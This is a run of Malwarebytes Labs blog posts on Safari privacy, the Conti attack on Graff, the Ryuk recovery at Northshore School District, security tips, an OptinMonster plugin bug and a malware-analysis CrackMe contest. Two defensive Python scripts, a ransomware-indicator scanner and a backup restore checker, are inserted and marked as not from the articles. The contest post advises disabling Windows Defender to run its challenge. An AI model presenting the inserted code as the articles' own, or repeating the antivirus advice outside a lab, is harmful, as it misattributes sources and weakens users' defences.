IT NEWS

Is Apple’s Safari browser the last, best hope for web privacy?

What browser do you use?

There’s a good chance—roughly two in three—that it’s Google Chrome. And even if you prefer a different browser, there’s a good chance that you’re using something built on Chromium, the open-source project underneath Chrome, such as Edge, Vivaldi, Brave, or Opera.

After a decade and a half of relatively healthy competition between vendors, the World Wide Web is trending towards a browser monoculture. We’ve been there before, and history suggests it’s bad news.

Last time it was Microsoft in the driver’s seat, and open standards and security were left tumbling about in the rear without a seat belt. This time Google has its hands on the wheel, and it’s our privacy in the back seat, being taken for a ride.

Chrome needs a counterweight and, thankfully, it still has one in Apple’s Safari browser. It’s imperfect, for sure, and its glacial pace of development might even be holding us all up, as Scott Gilbertson thoughtfully illustrated in a recent article on The Register. But it might also be the last, best hope for browser privacy we have.

Hear me out…

How Chrome ate the web

Google Chrome first appeared in 2008 and rapidly established itself as a browser that couldn’t be ignored, thanks to some catchy marketing on Google’s massive advertising platform. It was an excellent product with a ravenous appetite for market share, and its noisy focus on speed and security forced its rivals to take notice and compete on the same terms. Everyone benefitted.

And because none of the major browser vendors had enough market share to “embrace, extend and extinguish”, as Microsoft had attempted when Internet Explorer was dominant, everyone was forced to follow the same open standards. This meant that web applications mostly worked the same way, no matter what browser you used.

However, as Chrome’s popularity increased, Google was able to exert more and more influence on the web in service of its ad-based business model, to the detriment of users’ privacy.

For example, in 2016 Google introduced AMP, a set of web standards that were designed to make websites faster on mobile devices. In a move that could have come straight out of Redmond circa 1996, the AMP rulebook was written by Google and varied wildly from the open standards everyone had been working towards for the past fifteen years or so.

AMP was superficially open, but there was no AMP without Google. To use AMP your pages had to load code from Google-owned domains, debugging your code required Google-owned tools, your pages were stored in a Google-owned cache, and they were displayed under a Google-owned domain, so that users weren’t really on your website anymore, they were looking at your web pages on Google, thank you very much.

To incentivise the use of AMP, Google leveraged its search monopoly by creating “reserved” slots at the top of its mobile search rankings that were only available to AMP pages. If you wanted to top the search rankings, you had to play the AMP game.

Google pulled another bullish move in 2018 when it decided that logging into and out of a Google website like GMail or YouTube was the same as logging into the Chrome browser, because it could. So instead of being logged into the giant surveillance monster while you were using its websites, you were logged into the giant surveillance monster all the time, unless you remembered to log out of the browser, which of course you didn’t, because people just don’t think about logging in and out of their browser.

And then this year we had a great illustration of the bind that Google’s in even when it tries to do the right thing. It’s got the message that users want less tracking and more privacy, but unlike Firefox and Safari, Chrome can’t simply block the third-party cookies used for tracking, because Google’s advertising business model (and therefore Chrome’s very existence) depends on them.

Chrome is planning to ban third-party cookies, but not until at least 2023—years after Safari—because it needs to establish a replacement tracking tech.

The replacement is called Federated Learning of Cohorts (FLoC), and it’s designed to thread the needle of enabling targeted ads while keeping users anonymous, by lumping similar users into great big groups, called Cohorts. It may yet deliver ads that disrespect your privacy less, but it’s a brand new technology and it’s off to a slow, rocky start.

FLoC shows us why even a benign Google monoculture would hold back user privacy, and why Chrome needs a counterweight.

The other candidates

Edge

On the face of it, Microsoft seems a good potential counterweight to Google (stop sniggering at the back, a counterweight doesn’t need to be perfect, it just needs to have different weaknesses and be hard to kill).

Everyone who uses Windows gets its browser for free, and Microsoft has been happy to use privacy as a stick to beat its rival when it suits. For example, when it launched Internet Explorer 10, Microsoft enabled the nascent Do Not Track feature by default, a pro-privacy step that it knew Google couldn’t follow without cutting off its ad revenue. (Admittedly, it probably crashed the entire Do Not Track program in the process, but it was a terrible idea that was never going to work.)

Unfortunately, Microsoft handed in its big stick when it adopted Chromium, the open-source base of Chrome, as the foundation for its own Edge browser, effectively removing one of the last pillars holding up the open standards-based web.

Mozilla Firefox

Mozilla Firefox is my favourite browser and I would love to be talking it up as a potential counterweight to Chrome. After all, it walks the walk in terms of pro-privacy features, and it has already ended one browser monopoly, in 2002, when it emerged to challenge Internet Explorer’s lazy grip on the web.

Unfortunately, as good as it is, Firefox is on shaky ground. It costs a fortune to keep Firefox in the browser game, and the vast majority of the money it needs comes from Google, which pays hundreds of millions of dollars a year for the privilege of being Firefox’s default search engine. The deal is up in 2023 and Firefox’s market share is dwindling.

Our counterweight can’t stand in Google’s way while also depending on its largesse.

The case for Safari

Apple’s Safari is very much the “also ran” in the pantheon of modern browsers. It has never been cutting edge, or coveted, it’s only ever been, well, there. It isn’t my favourite browser. It’s not even my second favourite browser.

Gilbertson’s Register article rightly points out that Safari is a laggard when it comes to new features, saying “Apple’s Safari lags considerably behind its peers in supporting web features … well behind the competition”. But how much does that matter, really? The web was mostly feature complete years ago, and modern web standards are often complex definitions of things that almost nobody needs.

It may be a bit “low energy”, but we don’t actually need Safari to be better than Chrome at web standards, or to become the best, or the most popular browser, it just needs to be good where Chrome is bad, too big to ignore, and unlikely to fail.

Well, Apple is good where Google is bad: its business model doesn’t rely on advertising, so it can be unabashedly pro-privacy. And it’s been pro-privacy long enough for us to judge it on its track record, which is actually pretty good, recent hiccups notwithstanding.

For example, where Chrome can’t afford to block third-party cookies for another year or more, Safari has been going one better since 2017, when it introduced Intelligent Tracking Prevention (ITP), a clever box of tricks that also blocks other forms of cross-site tracking. And there’s plenty more besides.

And, yes, Safari is currently too big to ignore, and even getting a bit bigger. In fact it’s the only major browser that’s gained market share since the arrival of Chrome.

Statcounter puts Safari’s share of the desktop browser market at a steady 9.5 percent, and its share of the mobile browser market at about 25 percent. Even its modest share of the desktop market is too large to be ignored by anyone serious about building a web app, but it’s the iPhone that’s most likely to be a thorn in the side of anyone thinking of ignoring Apple’s browser.

According to Statista, the iPhone had a 14 percent global market share in the second quarter of 2021, but its data also shows that the iPhone’s global market share jumps to 20 percent in the last quarter of each and every year, presumably because of Christmas sales. This speaks to the platform’s continued desirability, which has always been Apple’s bulwark against cheaper and more capable competitors.

iPhone users also spend more money than Android users, and in rich countries like the USA, where you’ll find enormous software markets and lots of startups, the iPhone has a whopping 50 percent of the market or more.

The people who build the websites you use like Apple, and whether you like it or not, that matters.

When it comes to protecting privacy on the web, the most important thing might be the phones in the pockets of the web developers and the CEO.

The post Is Apple’s Safari browser the last, best hope for web privacy? appeared first on Malwarebytes Labs.

A week in security (Oct 25 – Oct 31)

Last week on Malwarebytes Labs

Other cybersecurity news

Stay safe, everyone!

The post A week in security (Oct 25 – Oct 31) appeared first on Malwarebytes Labs.

Celebrity jewelry house Graff falls victim to ransomware

Data on countless celebrities, including politicians, is apparently now in the hands of ransomware attackers after a group using the Conti variant compromised systems of one of the world’s most exclusive jewelry houses, Graff.

Despite what mathematicians like to think, there is an exception to every rule. When we wrote in our Demographics of Cybercrime Report that money (or its absence) changes our sense of safety, that wasn’t meant to imply that the rich feel like they’re bigger targets. Quite the opposite, those that don’t have money were found to feel less safe online. But the fact that the rich are, in fact, more attractive targets is of course true.

High-end targets

The personal information of celebrities like Oprah Winfrey, David and Victoria Beckham, Tom Hanks, and Melania and Donald Trump was stolen during a ransomware attack on Graff. The Conti ransomware gang has claimed responsibility.

The Conti News site claims to have published 1% of the stolen data

Conti is one of the gangs that, besides encrypting files, exfiltrates data from the compromised systems. When the victim refuses to pay the ransom, the gang publishes the exfiltrated data or sells it to the highest bidder. Conti recently announced that it will also publish data as soon as details or screenshots of the ransom negotiation process are leaked to journalists.

The Conti gang also made the news recently when it put access to compromised networks up for sale, and again when an underpaid turncoat leaked its manuals, technical guides, and software on an underground forum.

According to Graff, the vast majority of clients have not been the victim of personal data loss and those that were affected have been informed by mail.

The target

From the all-caps official statement on its site, Graff is shaken but not stirred.

“PLEASE BE ASSURED THAT WE REACTED SWIFTLY TO SHUT DOWN OUR NETWORK AND DIRECTLY INFORMED THOSE INDIVIDUALS WHOSE PERSONAL DATA WAS AFFECTED, ADVISING THEM ON APPROPRIATE STEPS TO TAKE. WE ALSO NOTIFIED THE INFORMATION COMMISSIONER’S OFFICE AND CONTINUE TO WORK WITH LAW ENFORCEMENT AGENCIES. FORTUNATELY, THANKS TO OUR ROBUST BACK-UP FACILITIES, NO DATA WAS IRREVOCABLY LOST. WE WERE ABLE TO REBUILD AND RESTART OUR SYSTEMS WITHIN DAYS TO CONTINUE TO OPERATE EFFECTIVELY AND ALL OUR SHOPS AND ECOMMERCE PLATFORM WERE UNAFFECTED AND CONTINUED TO OPERATE WITHOUT INTERRUPTION.”

The investigation

A spokesman for the UK’s Information Commissioner’s Office (ICO), which can impose fines of up to 4% of a company’s turnover for failing to comply with the Data Protection Act, said:

“We have received a report from Graff Diamonds Ltd regarding a ransomware attack. We will be contacting the organization to make further enquiries in relation to the information that has been provided.”

Unfortunately, knowing who did it and knowing who to arrest, and how, are two very different things when it comes to cybercrime. Sometimes attribution is hard, but even in cases where law enforcement knows who is behind the attack, it doesn’t make it easy to apprehend the evil-doers.

In this case, the group that was behind the attack made a public confession and published proof, but we don’t know the real names of the people in this group. We have good reason to assume that they are in Russia, but even of that we can’t be sure.

It is only in rare cases that cybercriminals travel to countries where they run the risk of being extradited to the US or another country where there is a warrant out for them.

What’s next?

In the case of high-end jeweler Graff, it doesn’t sound as if they have plans to pay the ransom, so it is highly likely that more of the exfiltrated data will be published on the Conti leak site.

The data that were stolen do not seem to be of an alarmingly private nature. Conti has been known to attack targets in the public health sector where far more delicate information is to be found. But maybe with this attack it has angered some people that have the power to make things happen.

Want to know more about Conti?

The post Celebrity jewelry house Graff falls victim to ransomware appeared first on Malwarebytes Labs.

Lessons from a real-life ransomware attack

Ransomware attacks, despite dramatically increasing in frequency this summer, remain opaque for many potential victims. It isn’t anyone’s fault, necessarily, since news articles about ransomware attacks often focus on the attack, the suspected threat actors, the ransomware type, and, well, not much else. Sadly, there’s rarely discussion about the lengthy recovery, which, according to the Ransomware Task Force, lasts an average of 287 days, or about the uncomfortable fact that the most commonly cited defense against ransomware, backups, often fails at the moment it is needed.

There also isn’t enough coverage about the human impact from ransomware. These cyberattacks do not just hit machines—they hit businesses, organizations, and the people who help those places run.

To better understand the nuts and bolts of a ransomware attack, we spoke to Ski Kacaroski, a systems administrator who, in 2019, helped pull his school district out of a ransomware nightmare that encrypted crucial data, locked up vital systems, and even threatened employee pay. Kacaroski spoke at length on our Lock and Code podcast, which can be heard in full below, offering several insights for those who may not know the severity of a ransomware attack.

Here are some of the most surprising and insightful lessons that he shared with us.

The first few hours are critical

At 11:37 pm on the night of September 20, 2019, cybercriminals launched a ransomware attack against the Northshore School District, which is north of Seattle in Washington State. The cybercriminals deployed the Ryuk ransomware against the school district, which relied on a datacenter of 300 Windows and Linux black box servers. The district also managed 4,000 staff members’ devices, including Windows, Mac, and Chromebook workstations, along with many iPad tablets.

The morning after the attack, Kacaroski got a phone call from one of the school district’s database administrators about problems with the database server. Shortly after logging into his employer’s VPN and poking around, Kacaroski learned that the server had been hit with ransomware. He saw one, unencrypted file—a ransomware note from the threat actors—and countless .ryuk file extensions nearly everywhere else.

These first few hours after the attack, Kacaroski said, are when he made a crucial mistake.

“If I was to redo this again, the minute I saw the first one [hit], I would’ve just pulled the power on every single box, ASAP,” Kacaroski said. “I definitely cost us probably a few boxes by not doing that quickly enough. But you never think you’re going to be hit by ransomware, so that’s not usually the first thing you consider when somebody reports the system is not working right.”

Kacaroski said that his school district’s cyber insurance provider later told his team that ransomware operators often target only Windows machines in these attacks. That kind of knowledge could have helped Kacaroski prioritize his and his colleague’s immediate reactions, protecting the Windows machines without worrying about any real threats to the Linux and Mac machines.
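As an added example (not code from the article, and not anything Northshore ran), here is a quick triage scan for the signature described above: a single plaintext ransom note sitting among many files renamed with the encryptor’s extension. The .ryuk extension comes from the article; the note filename RyukReadMe.txt, the directory layout and the file contents are constructed for illustration. Run against a file share or a mounted disk image, the per-directory ratio tells you which hosts to pull the plug on first and which data sets you will be restoring.

```python
"""Added example (not from the article): triage scan for the indicators
Kacaroski describes, that is, one plaintext ransom note among many files
renamed with the encryptor's extension."""
import os
import tempfile
from collections import Counter

ENCRYPTED_EXTENSIONS = {".ryuk"}        # the extension named in the article
RANSOM_NOTE_NAMES = {"RyukReadMe.txt"}   # assumed note filename, for illustration


def scan_tree(root, extensions=ENCRYPTED_EXTENSIONS,
              note_names=RANSOM_NOTE_NAMES, threshold=0.5):
    """Walk `root` and report how much of each directory has been encrypted.

    Returns a dict with:
      encrypted_files: total number of files carrying an encryptor extension
      ransom_notes:    relative paths of files whose name matches a known note
      hot_dirs:        [(relative dir, encrypted ratio)] for directories at or
                       above `threshold`, worst first
    Relative paths use forward slashes regardless of platform.
    """
    encrypted, total, notes = Counter(), Counter(), []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        for name in filenames:
            if name in note_names:
                notes.append(f"{rel}/{name}")
                continue                      # the note itself is not a data file
            total[rel] += 1
            if os.path.splitext(name)[1].lower() in extensions:
                encrypted[rel] += 1
    hot = [(d, encrypted[d] / total[d]) for d in total
           if encrypted[d] / total[d] >= threshold]
    hot.sort(key=lambda item: (-item[1], item[0]))
    return {"encrypted_files": sum(encrypted.values()),
            "ransom_notes": sorted(notes),
            "hot_dirs": hot}


def build_sample_tree():
    """Create a constructed directory layout that mimics a partly encrypted
    file share (sample data, not a real capture)."""
    root = tempfile.mkdtemp(prefix="ryuk-scan-")
    layout = {
        "shares/finance": ["budget.xlsx.ryuk", "payroll.csv.ryuk",
                           "q3.docx.ryuk", "RyukReadMe.txt"],
        "shares/hr": ["handbook.pdf", "roster.xlsx", "offer.docx"],
        "home/ski": ["notes.txt", "todo.md", "photo.jpg.ryuk", "scratch.py"],
    }
    for rel_dir, names in layout.items():
        path = os.path.join(root, *rel_dir.split("/"))
        os.makedirs(path)
        for name in names:
            with open(os.path.join(path, name), "w") as fh:
                fh.write("sample content\n")
    return root


if __name__ == "__main__":
    result = scan_tree(build_sample_tree())
    print(f"{result['encrypted_files']} encrypted files, "
          f"{len(result['ransom_notes'])} ransom note(s)")
    for directory, ratio in result["hot_dirs"]:
        print(f"  {ratio:5.0%}  {directory}")
```

The threshold matters: a share that is fully encrypted is a rebuild-from-backup job, while a home directory with one stray encrypted file usually means the encryptor was interrupted there, which is exactly the information a two-person team needs when deciding what to power off first.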

Your backups may not work 

In the immediate aftermath of the attack, Kacaroski said he and his colleague, another sysadmin who works on Windows, were dealing with “an incredible amount of uncertainty.” They did not know what critical services had been hit, they were still trying to figure out which drives were operational by pinging them, and they were still working under the assumption that all of their devices—not just Windows machines—could be threatened.

But at least initially, Kacaroski said he and his colleague were feeling somewhat confident. After all, Kacaroski said, his school district had implemented proper backups. Or so he thought.

“We have a very good backup system, or at least what we thought was an extremely solid, rock-solid backup system,” Kacaroski said. “And then we find out, at about 4 or 5 hours after the attack, that our backup system is completely gone.”

Kacaroski’s situation is, believe it or not, somewhat common. Earlier this year, despite having a backup system in place, the meat supplier JBS still decided to pay $11 million to its attackers to obtain a decryption key after getting hit with ransomware. The biggest mistake that organizations make in setting up their backups, as we discussed in a separate episode of Lock and Code, is that those backups are not properly and regularly tested.

This moment of realization, Kacaroski said, hit him and his colleague hard.

“It started to really sink in that I’m going to have to rebuild 180 Windows servers, and more importantly, rebuild Active Directory from scratch, with all those accounts and groups, and everything in it,” Kacaroski said. “That part really, really hurt us.”

A ransomware attack can be a months-long process

The attack against Northshore School District was not an overnight decision by a single group of hackers. In fact, it wasn’t even the work of one group of hackers.

According to Kacaroski, after both the FBI and the Department of Homeland Security helped investigate the attack on Northshore, employees learned about a months-long process that most likely led to the eventual ransomware infection. The initial breach of Northshore’s servers likely began in March 2019, six months before the final attack, when one group of hackers installed Emotet to gain access to Northshore’s servers. Once access had been gained, that first group sold its access to a second group which, according to what the FBI told Kacaroski, installed TrickBot to obtain domain credentials. Once those credentials were swiped, the TrickBot group sold them to yet another group, believed to be the same one that pushed the Ryuk ransomware onto the school district’s machines.

Interestingly, Kacaroski said that the school district was told that the attack was likely uncoordinated between the three different groups, with the groups acting independently and simply leveraging the prior group’s access.

What also surprised Kacaroski is that the Ryuk ransomware gangs operate like a franchise.

“What we’ve been told is the Ryuk group is a franchise like McDonalds,” Kacaroski said. “There’s the Ryuk group that runs the West Coast, the one that does the East Coast, the one that does something in between, and they don’t actually pay for access to the Ryuk stuff unless they have a successful attack, so they basically pay a fee back to the people that wrote it every time that they have a successful attack.”

There are more ransomware attacks than you’ve heard about—far more

The week after Northshore School District was hit with ransomware, its cyber insurance providers said four additional payments were made to other ransomware victims. That’s just one week in late 2019. With the number of attacks being reported on today, and the recorded, increased frequency of known attacks, we can safely assume that the number of undisclosed ransomware attacks has simply skyrocketed.

In immediate recovery, first prioritize and then look for “surprise” systems

In responding to the crisis of a ransomware attack, organizations need to prioritize which systems go back online first. Often, that work is made “easy” for an organization because ransomware tends to hit just days, or hours, before crucial deadlines.

For Northshore School District, their ransomware attack happened just days before employees were scheduled to be paid. That’s a deadline that simply can’t be missed, Kacaroski said.

“Payroll has to run—it is a legal thing. You can not not pay people. You have to pay them, which means four days after the attack, we had to have payroll up and running,” Kacaroski said. “That was the most critical thing.”

The school district then prioritized getting Active Directory and the student record system back online, as those systems were used countless times each day simply to help the school run. The student record system, Kacaroski said, was used by teachers, parents, and students themselves, and it needed to go back online quickly.

Finally, Kacaroski warned about what he called “surprise” systems—systems that are in place that an organization may not know about or may not understand are crucial until they’re gone. For Northshore School District, that system was for the school’s cafeteria and payment records.

“We had no clue that [the food services system] did 10,000 meals a day and 30,000 dollars… a day. We had no clue if the students had paid for their meals or haven’t paid or they owed us money,” Kacaroski said. “That one took a long time to get up and working because it was a distributed system and it had no backups at all.”

Avoid chokepoints during a long, collaborative recovery

The Northshore School District sysadmins are a small team of two, and in responding to the ransomware attack, there was only so much they could do—literally. Employees need to go home to sleep, and they need time to eat—as simple and basic as that sounds. Further, when recovering from a ransomware attack, there will almost always be what Kacaroski called a “system admin chokepoint.”

Because system administrators know how the systems themselves work, they can often become the single points of contact for rebuilding the entire business, piece by piece. Those system administrators can then get overburdened by too many teams coming to them repeatedly for information, sign-offs, and verifications.

To help move the recovery process forward, Kacaroski said organizations should find ways to free up their sysadmins, either by finding ways to rebuild systems independently, or by adding more sysadmins temporarily.

For Northshore School District, both methods were used.

After the attack, Kacaroski said his school district called up a local hosting firm that had done good work on small jobs that the school district itself couldn’t—or didn’t have the time to—do. Right after getting off the phone, that firm sent three additional sysadmins to help clean up the problem, Kacaroski said.

“We called them up. They gave us… essentially full-time, experienced sysadmins,” Kacaroski said. “We went from two to five. A huge increase.”

Kacaroski said that the beefed-up sysadmin team also gained some valuable breathing room when the school district found a paper-based workaround for its food services system. The school pared down its offerings and began providing only three options for school lunches. Each day during this temporary fix, the school could easily mark down, on paper, how many lunches of each type were purchased by the students, still keeping accurate records while giving the school extra time to rebuild its digital services. Further, the school district decided to move its student record system, which consisted of 27 Windows servers, to a SaaS solution, Kacaroski said.

“We had a vendor that we had a good relationship with, they dropped everything, and what is normally a six-month migration, they did in six days,” Kacaroski said. “But the most critical part is it didn’t have to go through the system admin chokepoint. That was a whole different group and they could just work on it on their own.”

All along the way, Kacaroski stressed the importance of strong relationships. Aided by local vendors, other school districts, parents, and other teams inside the school district itself, Northshore was able to recover about 80 – 85 percent of its systems and files in just two months, Kacaroski said.

“Like I say,” Kacaroski said, “relationships were the most critical thing.”


Listen to our full conversation on Lock and Code below


The post Lessons from a real-life ransomware attack appeared first on Malwarebytes Labs.

Tips to protect your data, security, and privacy from a hands-on expert

This post was authored by one of the most active helpers on the Malwarebytes forums who wishes to remain anonymous.

Back in the early days of personal computing, perhaps one of the only real concerns was data loss from a drive failure. That risk still exists, but we all face many other threats today too.

There are rootkits, Trojans, worms, viruses, ransomware, phishing, identity theft, and social engineering to worry about. And that’s not a comprehensive list.

So how can you avoid becoming a victim?

Security tips

Practice good security measures, such as slowing down and thinking before clicking on things. Use a strong, unique password for every account and site; a long passphrase that cannot be found in a dictionary is one recommendation for a strong password, and using a password manager is highly recommended. Wherever possible, enable multi-factor authentication (MFA) to help protect your accounts. Keep your operating system and installed software up to date, and check with your operating system, device, and software vendors frequently for security updates.

Pay close attention to the license agreements and installation screens when installing anything. If an installation screen offers you Custom or Advanced installation options, it is a good idea to select these as they will typically disclose what other third party software will also be installed. Take great care in every stage of the process and every offer screen, and make sure you know what it is you’re agreeing to before you click “Next.”

Avoid using Peer-to-Peer (P2P) file-sharing programs if possible. Likewise, avoid keygens, cracks, and other pirated software that can often compromise your data, privacy, or both.

Today, content blockers have become essential to help reduce ads, Trojans, phishing, and other undesirable content that an antivirus product alone may not cover. In addition, disabling browser push notifications is recommended, as the feature has become a source of abuse. Hover your mouse over website links and review where they actually go before clicking them. Consider using DuckDuckGo or StartPage as the home page and search provider in your browser to help improve your security and privacy.

Whether it’s your email, phone, messenger, or other applications, always be alert and on guard for someone trying to trick you into clicking on links or replying to a message. If someone is not on your address or contacts list, all the more reason to be suspicious. Never open attachments that come in unexpectedly in email, no matter how enticing. Even if from friends or family, always be cautious. If possible, save the attachment first, and have a site such as VirusTotal scan and confirm the attachment is not a threat before opening it.

Make sure you’re backing up your data frequently and validate that the data can be restored. It is highly recommended that you back up all of your essential data to an external device such as a USB drive, and that you do not keep the backup drive connected to the system all the time. It should be connected only to perform the backup, and disconnected once the backup has completed. If your computer were to become infected while the backup drive was connected, the infection could infect, delete, or encrypt your backup, rendering it useless. Never connect the backup drive to a computer you suspect may be infected until the computer or device has been cleaned.
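Two passages on this page point at the same remedy: the Northshore account above, where a “rock-solid” backup system turned out to be completely gone once the attack hit, and the advice here to keep the backup drive disconnected and to validate that data can be restored. The following added example (not the author’s code, and not anything the Northshore district ran) shows what “validate” means in practice. make_backup writes a tar archive with a SHA-256 manifest, verify_restore extracts the archive into a scratch directory and checks every file against the manifest, and demo runs both on a constructed sample tree, then overwrites the archive the way an encryptor would if the drive had been left connected, and shows the check failing rather than being discovered months later. All paths, file names and contents are constructed.

```python
"""Added example (not from either article): a backup that is only trusted
after a restore has been tested against a hash manifest."""
import hashlib
import json
import os
import tarfile
import tempfile


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def make_backup(src_dir, backup_dir):
    """Archive src_dir into backup_dir and write a manifest of file hashes
    next to it.  Returns (archive_path, manifest_path)."""
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(src_dir):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, src_dir).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    archive = os.path.join(backup_dir, "backup.tar.gz")
    with tarfile.open(archive, "w:gz") as tar:
        for rel in sorted(manifest):
            tar.add(os.path.join(src_dir, rel), arcname=rel)
    manifest_path = os.path.join(backup_dir, "backup.manifest.json")
    with open(manifest_path, "w") as fh:
        json.dump(manifest, fh, indent=2, sort_keys=True)
    return archive, manifest_path


def verify_restore(archive, manifest_path):
    """Restore into a fresh scratch directory and compare every file with the
    manifest.  Returns (ok, problems); an unreadable archive is reported as a
    failure rather than raised, so the check can run unattended."""
    with open(manifest_path) as fh:
        expected = json.load(fh)
    scratch = tempfile.mkdtemp(prefix="restore-test-")
    try:
        with tarfile.open(archive, "r:gz") as tar:
            try:
                tar.extractall(scratch, filter="data")   # Python 3.12+ safe-extraction filter
            except TypeError:                            # older Pythons lack the argument
                tar.extractall(scratch)
    except (tarfile.TarError, OSError) as exc:
        return False, [f"archive unreadable: {exc}"]
    problems = []
    for rel, digest in expected.items():
        path = os.path.join(scratch, *rel.split("/"))
        if not os.path.isfile(path):
            problems.append(f"missing after restore: {rel}")
        elif sha256_file(path) != digest:
            problems.append(f"hash mismatch after restore: {rel}")
    return not problems, problems


def demo():
    """Constructed end-to-end run.  Returns the (ok, problems) result for a
    healthy backup and then for the same backup after it was overwritten."""
    src = tempfile.mkdtemp(prefix="district-data-")
    backup_dir = tempfile.mkdtemp(prefix="offline-drive-")
    sample = {                                  # constructed sample files
        "payroll/september.csv": "employee_id,amount\n1001,2500.00\n",
        "records/policy.txt": "constructed sample document\n",
    }
    for rel, text in sample.items():
        path = os.path.join(src, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(text)
    archive, manifest = make_backup(src, backup_dir)
    healthy = verify_restore(archive, manifest)
    # Simulate an encryptor reaching a backup drive that was left connected:
    # the archive is overwritten in place while the manifest still looks fine.
    with open(archive, "wb") as fh:
        fh.write(b"ENCRYPTED" * 64)
    ruined = verify_restore(archive, manifest)
    return healthy, ruined


if __name__ == "__main__":
    for label, (ok, problems) in zip(("before", "after"), demo()):
        print(f"{label} tampering: {'OK' if ok else 'FAILED'} {problems}")
```

Keeping the manifest separate from the archive is deliberate: a backup that has been silently encrypted or truncated still fails the restore test even when the archive file is present and the right size, which is the case that “we have backups” usually hides.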

Support forums such as Malwarebytes Forums and a few others have members or staff that are highly trained and can assist you further if you have specific questions or issues about your devices or security, or would like more details on any particular information shared in this article.

URL links with further information or access to the programs mentioned:

Malwarebytes Support Forum
https://forums.malwarebytes.com

Tips to help protect from infection
https://forums.malwarebytes.com/topic/258363-tips-to-help-protect-from-infection/

Privacy – protecting your digital footprint
https://www.sans.org/newsletters/ouch/ouch-april-2021/

Do I need a Windows Registry Cleaner?
https://forums.malwarebytes.com/topic/126481-do-i-need-a-windows-registry-cleaner/

Backup your data
https://forums.malwarebytes.com/topic/136226-backup-software/

Content blockers

Malwarebytes Browser Guard
https://www.malwarebytes.com/browserguard/

uBlock Origin

NoScript Security Suite
https://addons.mozilla.org/en-US/firefox/addon/noscript/

Web Browser recommendations
https://www.privacytools.io/browsers/

Delete cookies automatically | Cookie AutoDelete plugin

https://github.com/Cookie-AutoDelete/Cookie-AutoDelete
https://chrome.google.com/webstore/detail/cookie-autodelete/fhcgjolkccmbidfldomjliifgaodjagh
https://addons.mozilla.org/en-US/firefox/addon/cookie-autodelete/

Browser push notifications: a feature asking to be abused
https://blog.malwarebytes.com/security-world/technology/2019/01/browser-push-notifications-feature-asking-abused/

The post Tips to protect your data, security, and privacy from a hands-on expert appeared first on Malwarebytes Labs.

Update your OptinMonster WordPress plugin immediately

WordPress, the incredibly popular content management platform, is currently dealing with a nasty plugin bug which allows redirects.

What is a WordPress plugin?

Like most blogging platforms, WordPress allows you to change up its default functionality. This is done by adding bits of kit called plugins. Some will be from WordPress itself, others are created and maintained by third parties. Any plugin can be potentially unsafe, or coded poorly, or compromised in some way. It’s also entirely possible for rogues to make their own innocent looking plugin and cause chaos.

Plugins are often in the news for these kinds of problems. Just this month, we covered a WordPress plugin susceptible to multiple vulnerabilities. Last month, it was a plugin leaving shoppers vulnerable to cross site scripting bugs and a form of JavaScript injection. There are so many plugins that it’s a surefire bet another plugin will be the latest compromise before long. And even when it’s not possible to be 100% sure a plugin was involved in an attack, you can end up with a bad situation very quickly. Shall we see what’s happened this time?

Bug causes problems for up to 1 million sites

Yes, an astonishing 1 million WordPress sites have been affected this time around. A plugin called OptinMonster is a tool designed to make your site “sticky”: that is, to keep people around for longer, convert interest into sales, sign visitors up to newsletters, build up elements of your site, and more.

This plugin relies on API endpoints to do its job. An API is an Application Programming Interface, and you can read a fantastic plain-English description of what an API is and does here.

Sadly, it seems some of the endpoints weren’t secure, and attackers with API keys designed for use with the OptinMonster service could get up to no good. Changes could be made to accounts, or malicious code could be placed on the site without a visitor’s knowledge.

CVE-2021-39341

The bug, known as CVE-2021-39341 and discovered at the end of September, has been addressed by the OptinMonster developers. Stolen API keys have been invalidated, and a patch was released on October 7. It’s possible more updates may appear over the next few weeks.

What should I do if I have OptinMonster on my website?

If your API key has been revoked, you’ll have to create a new one. You should also ensure your plugin is kept up to date. In fact, you should be doing this for all of your plugins. It may be worth checking if they’re still maintained, and browsing the latest reviews to see if people are suddenly complaining about peculiar activity.

If you have plugins installed which you don’t use at all, or only very rarely, it may be worth having a spring clean. Often we rush to install dozens of plugins on a new website, and before we know it, we’ve forgotten what half of them are. There they sit, for months or years, just waiting for a juicy vulnerability to come along. Why take the risk?

There are a number of ways you can keep your WordPress site safe from harm where plugins are concerned. Our advice is to devote some time to digging through the weeds and see what exactly you have lurking in the undergrowth.

The post Update your OptinMonster WordPress plugin immediately appeared first on Malwarebytes Labs.

The return of the Malwarebytes CrackMe

This blog post was authored by Hasherezade

Twice in the past (2017, 2018) we published a Capture-The-Flag challenge dedicated to aspiring malware analysts. Each time it was a Windows executable containing up to 3 stages to break in order to get the final flag. The goal of the crackme was to provide an exercise in which contestants could challenge themselves to understand and overcome techniques commonly present in real-life malware, presented on a harmless example.

After a long break, we decided to resume our small contest, and possibly make it an annual event. Without further ado, we present you the Malwarebytes CrackMe number 3!

Rules of the contest

The rules remain mostly unchanged since the second edition. As before we have two parallel tracks of the contest:

  1. The fastest solve. The three earliest submitted flags win. The flag should be submitted along with (minimalist) notes about the steps taken to find it. (No detailed write-up is required.) Any updates about the known winners in this category will be appended to this post.
  2. The best write-up. The write-up will be judged by its educational value, clarity, and accuracy. The author should show their method of solving the CrackMe, as well as provide an explanation of the techniques used in the challenge. Write-up submissions close two weeks after the start of the challenge.

In each track we will select three winners that will be rewarded with unique Malwarebytes swag. The first place winner in each category will additionally get any IT-related book of their choice. All the solvers are going to be listed in our hall of fame.

The flag is in format: flag{...}

Submissions to both contests should be sent as a private message to the Twitter account: @hasherezade.

Three weeks after the challenge started we will publish the closing summary, along with the detailed walk-through, provided by the author.

WARNING: We are sorry, but Malwarebytes employees and people who had access to the CrackMe before the official publication are not allowed to participate.

The application

The application is a Windows executable. It was tested on Windows 8 and above.

WARNING: please mind the fact that since the CrackMe contains techniques similar to those used in malware, it may be flagged by various AV products. It is a known false positive. We recommend running it on a VM, with Windows Defender disabled.

You can download it here.

MB crackme3

Best of luck, and have fun!

Hall of fame

We already have the first winner in the category “the fastest solve”:

  1. 🥇 @nazywam

Who will be next?

